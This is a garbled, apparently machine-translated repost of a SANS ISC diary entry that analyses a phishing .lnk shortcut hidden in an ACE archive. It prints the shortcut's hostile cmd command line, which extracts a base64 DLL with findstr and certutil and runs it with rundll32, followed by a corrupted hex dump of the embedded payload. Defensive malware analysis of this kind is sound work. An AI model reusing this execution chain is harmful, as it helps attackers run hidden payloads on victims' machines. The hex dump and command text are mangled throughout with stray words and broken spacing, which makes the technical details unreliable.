Parsing a malicious. lnk file that embeds payload

Original: https://isc.sans.edu/diary/Analyzis+of+a+Malicious+.lnk+File+with+an+Embedded+Payload/20763

We received some feedback today from Nick, a SANS ISC reader who detected an interesting phishing campaign based on an ACE File. I also detected the same kind of file earlier this morning. ACE is an old compression algorithm developed by a German company called E-merge. This file format is popular around the year 2000. Today it almost disappeared and is replaced by more popular formats but ACE files can still is handled by popular tools L Ike WinRAR or WinZIP.  The fact, the format is quite, could help, bypass common low-level filters implemented by anti-spam solutions. The phishing email is a classic one with an attached. RAR file named "Faktura.rar". But the file was in fact an ACE file:

# File Faktura.rarfaktura.rar:ACE Archive data version, from WIN/32, version extract, contains av-string (Unregi stered), SOLID

It ' s VT score is very low:2/55 (c5e4e981269209f2b67fc24167fc7ce5) The ACE file contains a. lnk file. Link files is shortcut files used by Microsoft Windows to point to another executable file. The file VT score is also very low:3/55 (1E56ACF7B536D8F87234B4F7846FE0C0). The link file is configured-start minimized in%currentdir%. It points to a command line prompt with arguments that is pretty evil (the output has been formatted for more visibility) :

%windir%\system32\cmd.exe/v:on/c dir%temp%\faktura.lnk/s/b >%temp%\bwtfo && set/p K=<%TEMP%\BWTFO & ; &findstr Tvqqaa!k!>%temp%\bwtfo && certutil-decode%temp%\bwtfo%temp%\bwtfo.dll && del%TEMP %\BWTFO!k! && rundll32%temp%\bwtfo.dll,phojclewfai Yefm

A temporary file is created and filled with some malicious code and executed via Rundll32. In this case, the no macro to download data from a third party website.  the malicious code is simply appended to the link file and starts with the string ' Tvqqaa ':

00000740 A3 5d 0c E0 A5 4d, A3 e4 one-off BD 29 00 |. A]4...m.5 ...). | 00000750 0d 0a 54 56 71 51 41-| Pv8us ... tvqqa|00000760 4d in a 41-in-A-41 | amaaaaeaaaa//8aa|00000770 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 | lgaaaaaaaaaqaaaa|00000780 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA|000007A0 41 41 41 41 41 41 41 41 41 41 41 75 41 41 41 41 | Aaaaaaaaaaauaaaa|000007b0-In-a-6e 4e 49 62 67 42 54 | A4FUG4ATANNIBGBT|000007C0 4d (63)-----6d  M0hvghpcybwcm9nc|000007d0 6d, 4e, 6d, 57, |MFTIGNHBM5VDCBIZ|000007E0 53 42 79 64 67 61 57 34 67 52 45 39 54 49 | SBYDW4GAW4GRE9TI|000007F0 5a, 4b 4a 41 41 41 41 | g1vzguudq0kjaaaa|00000800-In-a-6f-4b 6c 69 | aaaaacho8vbw8kli|00000810 4d, 6a, 33, 2b, 69 | MpcPYJDWQWIP+K3I|00000820 4d 4c All-in-all-in-4b 4f-69 | mlcpygexkoiwskli|00000830 6f 6a All-in-a--6d 6c 6a 61 | e3dtojcwqwiumlja|00000840 4d 50 43 70 59 67 41 41 41 41 41 41 41 41 41 41 | mpcpygaaaaaaaaaa|00000850-In-A-4d (4b) 4b 56 |  fbfaabmaquakstkv|00000860-------51 73 42 42 51 77 41 44 41 41 41 41 41 67 41 41 | qsbbqwadaaaaagaa|00000880 41 41 41 41 41 41 41 45 41 41 41 41 42 41 41 41 | aaaaaaaeaaaabaaa|00000890 41 41 67 41 41 41 41 41 41 41 51 41 42 41 41 41 | AAGAAAAAAAQABAAA|000008A0 41 41 43 41 41 41 45 41 41 41 41 41 41 41 41 41 |  aacaaaeaaaaaaaaa|

You can see immediately, the code is BASE64 encoded and can be extracted quite easily:

# Strings Faktura.lnk | grep Tvqqaa | base64-d->malicious.bin# file malicious.binmalicious.bin:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

The PE file has a VT score of 1/55 (a911640a5dd4bca99c31eeac18e90901). I ' ll have a look at this binary later because it is not reported as malicious by the FireEye appliance that analyzed it. Xavier Mertens
ISC Handler-freelance Security Consultant
PGP Key

Parsing a malicious. lnk file that embeds payload